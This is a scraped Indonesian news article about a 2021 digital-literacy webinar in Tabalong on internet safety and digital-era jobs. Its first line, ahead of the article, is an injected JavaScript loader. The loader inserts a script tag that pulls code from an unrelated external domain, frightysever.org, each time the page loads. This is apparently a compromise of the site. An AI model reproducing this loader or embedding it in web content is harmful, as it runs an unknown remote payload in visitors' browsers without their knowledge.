(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tabalong

Webinar Literasi Digital Tabalong: Menghadapi Era Internet Bebas dan Sehat


KANALKALIMANTAN.COM, TANJUNG – Kecakapan digital harus ditingkatkan dalam masyarakat agar mampu menampilkan konten kreatif mendidik yang menyejukkan dan menyerukan perdamaian. Mengingat tantangan di ruang digital semakin besar, seperti konten-konten negatif, kejahatan penipuan daring, perjudian, eksploitasi seksual pada anak, ujaran kebencian, radikalisme berbasis digital.

Kementerian Komunikasi dan Informatika bekerja sama dengan Siberkreasi menggelar acara webinar literasi digital “Menghadapi Era Internet, Bebas dan Sehat”, dibuka Penjabat (Pj) Bupati Kota Tabalong Drs H Anang Syakhfiani, Kamis (1/7/2021) siang. Acara dipandu host Shabrina Anwari melalui Zoom Meeting.

Kegiatan in bertujuan untuk mendorong masyarakat menggunakan internet secara cerdas, positif, kreatif, dan produktif. Sehingga dapat meningkatkan kemampuan kognitifnya untuk mengidentifikasi hoaks, serta mencegah terpapar dampak negatif penggunaan internet.

Baca juga: Launching dan Seleksi Tenant IBT Banua Innovation Baristand Industri Banjarbaru 2021

 

Salah satu nara sumber webinar digital literasi, Windy Oktanaura dari Accountant at Wardah Cosmetics membahas Digital Safety “Cyber Safety: Tips dan Pentingnya internet sehat.”

Ia mengatakan, menjalankan internet sehat dan aman cyber safety atau internet safety merupakan sebuah bentuk keamanan, saat kita mengakses internet. Maka itu, masyarakat perlu memahami digital safety karena banyak terdapat kejahatan melalui jaringan internet.


“Keamanan internet menjadi salah satu hal yang cukup krusial yang harus diperhatikan sekarang terutama untuk memberikan edukasi ke generasi muda,” tegasnya.

“Kenapa sih kita perlu yang namanya internet sehat dalam dunia digital yang kita nikmati, jadi gerakan internet sehat sebenarnya muncul karena aktivitas internet saat itu masih terbilang bebas tanpa adanya aturan hukum,” tambahnya.

Penggunaan internet secara sehat dan aman perlu ditanamkan sejak dini melalui pembelajaran etika berinternet, secara sehat untuk menghindari kebiasaan jelek.

Biasanya apa yang di hadapi di dunia nyata akan terbawa di dunia maya, hal ini yang akan mendorong generasi muda untuk menciptakan kreativitas melalui dunia digital.

Baca juga: Animo Meningkat, Ka Dinkes HSU: Pendaftar Vaksinasi Covid-19 Capai 12.500 Orang

“Jadi kita bisa memanfaatkan dunia digital atau digital yang saat ini untuk berkreasi melakukan edukasi jadi jangan sampai disalahgunakan,” jelasnya.

Sementara itu, Ketua Himpunan Pengusaha Muda Indonesia (HIPMI) Tabalong Genta Pramadhona mencermati literasi digital dengan tema “Trend Pekerjaan dan Usaha di Dunia Digital”

Perubahan besar pada peran pekerjaan di masa sekarang dan masa depan dengan sentuhan teknologi. Profesi tukang ojek yang tadinya di pangkalan sekarang jadi naik kelas, pakai jaket pakai seragam.

“Banyak ahli yang memprediksikan beberapa profesi menjadi tidak dibutuhkan lagi di masa depan, nantinya akan lebih mengandalkan teknologi komputerisasi tenaga manusia digantikan oleh robot,” ujar Genta Pramadhona.

Di era dunia digital yang semakin canggih ini ada mobil otomatis sehingga tidak perlu menyetir sendiri lagi mobil itu sudah bisa jalan sendiri.

“Jadi ini juga ancaman untuk kita dibuatnya mobil teknologi terbaru muncul apalagi diklaim sangat ramah lingkungan, kita bisa bisa ngga ada apa-apanya dengan robot,” kata Genta.

Sebuah profesi tenaga kerja yang punya keterampilan soft skill keterampilan hard skill dan keterampilan non teknis dan keterampilan non teknis, adalah salah satu situs kerja yang cukup terkenal di dunia saat ini. (Kanalkalimantan.com/dewi)

Reporter: dewi
Editor: cell


Risa

Recent Posts

Dua APILL Disiapkan, Atasi Kemacetan di Panglima Batur Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru menggelar ekspose pembangunan Area Traffic Control System (ATCS)… Read More

44 menit ago

Dua Bapaslon Jalur Non Partai Serahkan Syarat Dukungan ke KPU Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN – Detik-detik terakhir penutupan penyerahan syarat dukungan bakal pasangan calon (Bapaslon) Wali Kota… Read More

1 jam ago

Bupati Lepas TP PKK Banjar Wakil Kalsel ke Parade Budaya Nusantara

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur melepas peserta lomba Parade Budaya Nusantara, di… Read More

2 jam ago

Tak Ada Peminat Jalur Perseorangan di Pilwali Banjarbaru 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemilihan Wali Kota dan Wakil Wali Kota dalam kontestasi Pilkada 2024 di… Read More

3 jam ago

Kebakaran Dini Hari di Palangkaraya, Dana Hanya Bisa Selamatkan Anak Istri

KANALKALIMANTAN.COM, PALANGKARAYA - Puluhan rumah di permukiman padat penduduk Jalan Mendawai Induk, Kota Palangkaraya, Kalimantan… Read More

6 jam ago

Amuntai Expo dan Bazar UMKM 2024 Berakhir

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) melalui Asisten Perekonomian dan Pembangunan… Read More

6 jam ago

This website uses cookies.